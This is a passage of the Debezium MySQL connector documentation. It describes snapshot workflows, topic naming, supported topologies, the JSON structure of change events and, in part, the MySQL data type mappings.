statement.\n\nSee also: {link-prefix}:{link-mysql-connector}#mysql-schema-history-topic[schema history topic].\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mysql-connectors-perform-database-snapshots\n\/\/ Title: How {prodname} MySQL connectors perform database snapshots\n[[mysql-snapshots]]\n=== Snapshots\n\nWhen a {prodname} MySQL connector is first started, it performs an initial _consistent snapshot_ of your database. The following flow describes how the connector creates this snapshot. This flow is for the default snapshot mode, which is `initial`. For information about other snapshot modes, see the {link-prefix}:{link-mysql-connector}#mysql-property-snapshot-mode[MySQL connector `snapshot.mode` configuration property].\n\n.Workflow for performing an initial snapshot with a global read lock\n[cols=\"1,9\",options=\"header\",subs=\"+attributes\"]\n|===\n|Step |Action\n\n|1\na| Grabs a global read lock that blocks _writes_ by other database clients. +\n + \nThe snapshot itself does not prevent other clients from applying DDL that might interfere with the connector's attempt to read the binlog position and table schemas. 
The connector keeps the global read lock while it reads the binlog position, and releases the lock as described in a later step.\n\n|2\na|Starts a transaction with link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/innodb-consistent-read.html[repeatable read semantics] to ensure that all subsequent reads within the transaction are done against the _consistent snapshot_.\n\n|3\na|Reads the current binlog position.\n\n|4\na|Reads the schema of the databases and tables for which the connector is configured to capture changes.\n\n|5\na|Releases the global read lock. Other database clients can now write to the database.\n\n|6\na|If applicable, writes the DDL changes to the schema change topic, including all necessary `DROP...` and `CREATE...` DDL statements. \n\n|7\na|Scans the database tables. For each row, the connector emits `CREATE` events to the relevant table-specific Kafka topics.\n\n|8\na|Commits the transaction.\n\n|9\na|Records the completed snapshot in the connector offsets.\n\n|===\n\nConnector restarts::\nIf the connector fails, stops, or is rebalanced while performing the _initial snapshot_, then after the connector restarts, it performs a new snapshot. After that _initial snapshot_ is completed, the {prodname} MySQL connector restarts from the same position in the binlog so it does not miss any updates.\n+\nIf the connector stops for long enough, MySQL could purge old binlog files and the connector's position would be lost. If the position is lost, the connector reverts to the _initial snapshot_ for its starting position. For more tips on troubleshooting the {prodname} MySQL connector, see {link-prefix}:{link-mysql-connector}#mysql-when-things-go-wrong[behavior when things go wrong].\n\nGlobal read locks not allowed::\nSome environments do not allow global read locks. If the {prodname} MySQL connector detects that global read locks are not permitted, the connector uses table-level locks instead and performs a snapshot with this method. This requires the database user for the {prodname} connector to have `LOCK TABLES` privileges. \n+\n.Workflow for performing an initial snapshot with table-level locks\n[cols=\"1,9\",options=\"header\",subs=\"+attributes\"]\n|===\n|Step |Action\n\n|1\n|Obtains table-level locks. \n\n|2\na|Starts a transaction with link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/innodb-consistent-read.html[repeatable read semantics] to ensure that all subsequent reads within the transaction are done against the _consistent snapshot_.\n\n|3\n|Reads and filters the names of the databases and tables.\n\n|4\na|Reads the current binlog position.\n\n|5\na|Reads the schema of the databases and tables for which the connector is configured to capture changes. \n\n|6\na|If applicable, writes the DDL changes to the schema change topic, including all necessary `DROP...` and `CREATE...` DDL statements.\n\n|7\na|Scans the database tables. For each row, the connector emits `CREATE` events to the relevant table-specific Kafka topics.\n\n|8\na|Commits the transaction.\n\n|9\n|Releases the table-level locks.\n\n|10\na|Records the completed snapshot in the connector offsets.\n\n|===\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-mysql-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} MySQL change event records\n[[mysql-topic-names]]\n=== Topic names\n\nThe default behavior is that a {prodname} MySQL connector writes events for all `INSERT`, `UPDATE`, and `DELETE` operations in one table to one Kafka topic. The Kafka topic naming convention is as follows:\n\n_serverName.databaseName.tableName_\n\nSuppose that `fulfillment` is the server name, `inventory` is the database name, and the database contains tables named `orders`, `customers`, and `products`. The {prodname} MySQL connector emits events to three Kafka topics, one for each table in the database:\n\n----\nfulfillment.inventory.orders\nfulfillment.inventory.customers\nfulfillment.inventory.products\n----\n\n\/\/ Type: concept\n\/\/ ModuleID: mysql-topologies-supported-by-debezium-connectors\n\/\/ Title: MySQL topologies supported by {prodname} connectors\n[id=\"supported-mysql-topologies\"]\n=== Supported MySQL topologies\n\nThe {prodname} MySQL connector supports the following MySQL topologies:\n\nStandalone::\nWhen a single MySQL server is used, the server must have the binlog enabled (_and optionally GTIDs enabled_) so the {prodname} MySQL connector can monitor the server. This is often acceptable, since the binary log can also be used as an incremental link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/backup-methods.html[backup]. In this case, the MySQL connector always connects to and follows this standalone MySQL server instance.\n\nPrimary and replica::\nThe {prodname} MySQL connector can follow one of the primary servers or one of the replicas (_if that replica has its binlog enabled_), but the connector sees changes in only the cluster that is visible to that server. Generally, this is not a problem except for the multi-primary topologies.\n+\nThe connector records its position in the server\u2019s binlog, which is different on each server in the cluster. Therefore, the connector must follow just one MySQL server instance. If that server fails, that server must be restarted or recovered before the connector can continue.\n\nHighly available clusters::\nA variety of link:https:\/\/dev.mysql.com\/doc\/mysql-ha-scalability\/en\/[high availability] solutions exist for MySQL, and they make it significantly easier to tolerate and almost immediately recover from problems and failures. Most HA MySQL clusters use GTIDs so that replicas are able to keep track of all changes on any of the primary servers.\n\nMulti-primary::\nlink:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/mysql-cluster-replication-multi-source.html[Network Database (NDB) cluster replication] uses one or more MySQL replica nodes that each replicate from multiple primary servers. This is a powerful way to aggregate the replication of multiple MySQL clusters. This topology requires the use of GTIDs.\n+\nA {prodname} MySQL connector can use these multi-primary MySQL replicas as sources, and can fail over to different multi-primary MySQL replicas as long as the new replica is caught up to the old replica. That is, the new replica has all transactions that were seen on the first replica. This works even if the connector is using only a subset of databases and\/or tables, as the connector can be configured to include or exclude specific GTID sources when attempting to reconnect to a new multi-primary MySQL replica and find the correct position in the binlog.
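\n+\nFor example, failover handling can be limited to known GTID sources by setting the {link-prefix}:{link-mysql-connector}#mysql-property-gtid-source-includes[`gtid.source.includes`] property. The following fragment is a sketch in which the server UUIDs are placeholders:\n+\n----\n# placeholder UUIDs; list the sources whose GTID ranges the connector may use\ngtid.source.includes=7c1b9a42-0000-0000-0000-000000000001,9b4ad6f0-0000-0000-0000-000000000002\n----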
\n\nHosted::\nThe {prodname} MySQL connector can use hosted options such as Amazon RDS and Amazon Aurora.\n+\nBecause these hosted options do not allow a global read lock, table-level locks are used to create the _consistent snapshot_.\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-mysql-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} MySQL connector data change events\n[[mysql-events]]\n== Data change events\n\nThe {prodname} MySQL connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed. \n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained. \n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce them. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure: \n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/<1>\n ...\n },\n \"payload\": { \/\/<2>\n ...\n },\n \"schema\": { \/\/<3> \n ...\n },\n \"payload\": { \/\/<4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-mysql-connector}#mysql-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed. \n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas. \n\n|4\n|`payload`\n|The second `payload` field is part of the event value. 
It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See {link-prefix}:{link-mysql-connector}#mysql-topic-names[topic names].\n\n[WARNING]\n====\nThe MySQL connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or `_`. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or `_`. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\nifdef::product[]\nMore details are in the following topics:\n\n* xref:about-keys-in-debezium-mysql-change-events[]\n* xref:about-values-in-debezium-mysql-change-events[]\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-mysql-change-events\n\/\/ Title: About keys in {prodname} mysql change events\n[[mysql-change-event-keys]]\n=== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's `PRIMARY KEY` (or unique constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table. \n\n[source,sql]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure. In JSON, it looks like this:\n\n[source,json,index=0]\n----\n{\n \"schema\": { <1>\n \"type\": \"struct\",\n \"name\": \"mysql-server-1.inventory.customers.Key\", <2>\n \"optional\": false, <3>\n \"fields\": [ <4>\n {\n \"field\": \"id\",\n \"type\": \"int32\",\n \"optional\": false\n }\n ]\n },\n \"payload\": { <5>\n \"id\": 1001\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion. \n\n|2\n|`mysql-server-1.inventory.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: + \n\n* `mysql-server-1` is the name of the connector that generated this event. + \n* `inventory` is the database that contains the table that was changed. 
+\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields` \n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key contains a single `id` field whose value is `1001`.\n\n|===\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-mysql-change-events\n\/\/ Title: About values in {prodname} MySQL change events\n[[mysql-change-event-values]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update, or delete data all have a value payload with an envelope structure. \n\nConsider the same sample table that was used to show an example of a change event key: \n\n[source,sql]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\nThe value portion of a change event for a change to this table is described for: \n\n* <<mysql-create-events,_create_ events>>\n* <<mysql-update-events,_update_ events>>\n* <<mysql-primary-key-updates,Primary key updates>>\n* <<mysql-delete-events,_delete_ events>>\n* <<mysql-tombstone-events,Tombstone events>>\n\n\/\/ Type: continue\n[id=\"mysql-create-events\"]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\", \n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n 
\"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.mysql.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"mysql-server-1.inventory.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"op\": \"c\", \/\/ <6>\n \"ts_ms\": 1465491411815, \/\/ <7>\n \"before\": null, \/\/ <8>\n \"after\": { \/\/ <9>\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <10>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 0,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"INSERT INTO customers (first_name, last_name, email) VALUES ('Anne', 'Kretchmar', 'annek@noanswer.org')\"\n }\n }\n}\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table. \n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`mysql-server-1.inventory.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\n|`io.debezium.connector.mysql.Source` is the schema for the payload's `source` field. This schema is specific to the MySQL connector. The connector uses it for all events that it generates. \n\n|4\n|`name`\n|`mysql-server-1.inventory.customers.Envelope` is the schema for the overall structure of the payload, where `mysql-server-1` is the connector name, `inventory` is the database, and `customers` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the rows they describe. 
This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`op`\na| Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are: \n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies only to snapshots)\n\n|7\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\n|8\n|`before`\n| An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content. \n\n|9\n|`after`\n| An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|10\n|`source`\na| Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the new row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|===\n\n\/\/ Type: continue\n[id=\"mysql-update-events\"]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... 
},\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": { \/\/ <2>\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 1465581,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 223344,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 484,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"UPDATE customers SET first_name='Anne Marie' WHERE id=1004\"\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1465581029523 \n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. In this example, the `first_name` value is `Anne.`\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `first_name` value is now `Anne Marie`. \n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event is from a different position in the binlog. The source metadata includes: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the updated row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-mysql-connector}#mysql-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row. Details are in the next section. \n====\n\n\/\/ Type: continue\n[id=\"mysql-primary-key-updates\"]\n=== Primary key updates\n\nAn `UPDATE` operation that changes a row's primary key field(s) is known\nas a primary key change. For a primary key change, in place of an `UPDATE` event record, the connector emits a `DELETE` event record for the old key and a `CREATE` event record for the new (updated) key. 
\n\n\/\/ Type: continue\n[id=\"mysql-delete-events\"]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 1465581,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 223344,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 805,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"DELETE FROM customers WHERE id=1004\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1465581902461 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `pos` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the updated row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. 
The time is based on the system clock in the JVM running the Kafka Connect task.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row. The old values are included because some consumers might require them in order to properly handle the removal.\n\nMySQL connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n\/\/ Type: continue\n[id=\"mysql-tombstone-events\"]\n=== Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s MySQL connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-mysql-connectors-map-data-types\n\/\/ Title: How {prodname} MySQL connectors map data types\n[[mysql-data-types]]\n== Data type mappings\n\nThe {prodname} MySQL connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. The MySQL data type of that column dictates how {prodname} represents the value in the event.\n\nColumns that store strings are defined in MySQL with a character set and collation. The MySQL connector uses the column's character set when reading the binary representation of the column values in the binlog events. \n\nThe connector can map MySQL data types to both _literal_ and _semantic_ types.\n\n* *Literal type*: how the value is represented using Kafka Connect schema types\n* *Semantic type*: how the Kafka Connect schema captures the meaning of the field (schema name)\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:mysql-basic-types[]\n* xref:mysql-temporal-types[]\n* xref:mysql-decimal-types[]\n* xref:mysql-boolean-values[]\n* xref:mysql-spatial-types[]\n\nendif::product[]\n\n[id=\"mysql-basic-types\"]\n=== Basic types\n\nThe following table shows how the connector maps basic MySQL data types.\n\n.Descriptions of basic type mappings\n[cols=\"25%a,20%a,55%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`BOOLEAN, BOOL`\n|`BOOLEAN`\na|_n\/a_\n\n|`BIT(1)`\n|`BOOLEAN`\na|_n\/a_\n\n|`BIT(>1)`\n|`BYTES`\na|`io.debezium.data.Bits` +\nThe `length` schema parameter contains an integer that represents the number of bits. The `byte[]` contains the bits in _little-endian_ form and is sized to contain the specified number of bits. For example, where `n` is bits: +\n`numBytes = n\/8 + (n%8== 0 ? 
0 : 1)`\n\n|`TINYINT`\n|`INT16`\na|_n\/a_\n\n|`SMALLINT[(M)]`\n|`INT16`\na|_n\/a_\n\n|`MEDIUMINT[(M)]`\n|`INT32`\na|_n\/a_\n\n|`INT, INTEGER[(M)]`\n|`INT32`\na|_n\/a_\n\n|`BIGINT[(M)]`\n|`INT64`\na|_n\/a_\n\n|`REAL[(M,D)]`\n|`FLOAT32`\na|_n\/a_\n\n|`FLOAT[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`DOUBLE[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`CHAR(M)`\n|`STRING`\na|_n\/a_\n\n|`VARCHAR(M)`\n|`STRING`\na|_n\/a_\n\n|`BINARY(M)`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`VARBINARY(M)`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`TINYBLOB`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`TINYTEXT`\n|`STRING`\na|_n\/a_\n\n|`BLOB`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`TEXT`\n|`STRING`\na|_n\/a_\n\n|`MEDIUMBLOB`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`MEDIUMTEXT`\n|`STRING`\na|_n\/a_\n\n|`LONGBLOB`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`LONGTEXT`\n|`STRING`\na|_n\/a_\n\n|`JSON`\n|`STRING`\na|`io.debezium.data.Json` +\nContains the string representation of a `JSON` document, array, or scalar.\n\n|`ENUM`\n|`STRING`\na|`io.debezium.data.Enum` +\nThe `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`SET`\n|`STRING`\na|`io.debezium.data.EnumSet` +\nThe `allowed` schema parameter contains the comma-separated list of allowed 